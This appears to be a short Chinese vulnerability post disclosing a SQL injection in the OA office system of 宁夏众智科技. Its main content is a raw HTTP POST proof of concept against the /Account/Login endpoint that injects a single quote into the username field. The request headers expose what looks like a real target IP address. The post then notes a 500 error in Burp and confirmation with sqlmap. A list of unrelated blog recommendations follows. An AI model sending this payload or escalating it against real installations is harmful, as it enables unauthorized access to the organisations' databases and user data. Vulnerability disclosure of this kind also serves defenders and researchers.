宁夏众智科技OA办公系统存在SQL注入漏洞

漏洞描述

宁夏众智科技OA办公系统存在SQL注入漏洞

漏洞复现

POC

复制代码
POST /Account/Login?ACT=Index&CLR=Home HTTP/1.1
Host: 
Content-Length: 45
Cache-Control: max-age=0
Origin: http://39.105.48.206
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Edg/129.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://39.105.48.206/Account/Login?ACT=Index&CLR=Home
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: keep-alive

username=admin%27&password=1&RememberMe=false

bp报错500

sqlmap确认漏洞

相关推荐
恒拓高科WorkPlus2 小时前
BeeWorks:打造安全可控的企业内网即时通讯平台
大数据·人工智能·安全
newxtc3 小时前
【指纹浏览器系列-chromium编译】
人工智能·安全
恒拓高科WorkPlus4 小时前
一款安全好用的企业即时通讯平台,支持统一门户
大数据·人工智能·安全
zhongtianhulian6 小时前
中天智能装备有限公司的托盘式立库有哪些安全保护措施?
安全·云计算
appcanLiYunLong7 小时前
Webrtc让浏览器实现无服务器中转的安全私密聊天
安全·serverless·webrtc
群联云防护小杜7 小时前
隐藏源站IP与SD-WAN回源优化:高防架构的核心实践
网络·分布式·网络协议·tcp/ip·安全·架构·ddos
zhongqu_3dnest8 小时前
VR 全景多维赋能,众趣科技助力零售业开启购物新时代
科技·vr
SlientICE9 小时前
预防WIFI攻击,保证网络安全
网络·安全·php
Aphelios38011 小时前
智能Todo协作系统开发日志(二):架构优化与安全增强
java·前端·javascript·安全·个人开发
咖喱年糕14 小时前
【Windows】系统安全移除移动存储设备指南:告别「设备被占用」弹窗
windows·安全·系统安全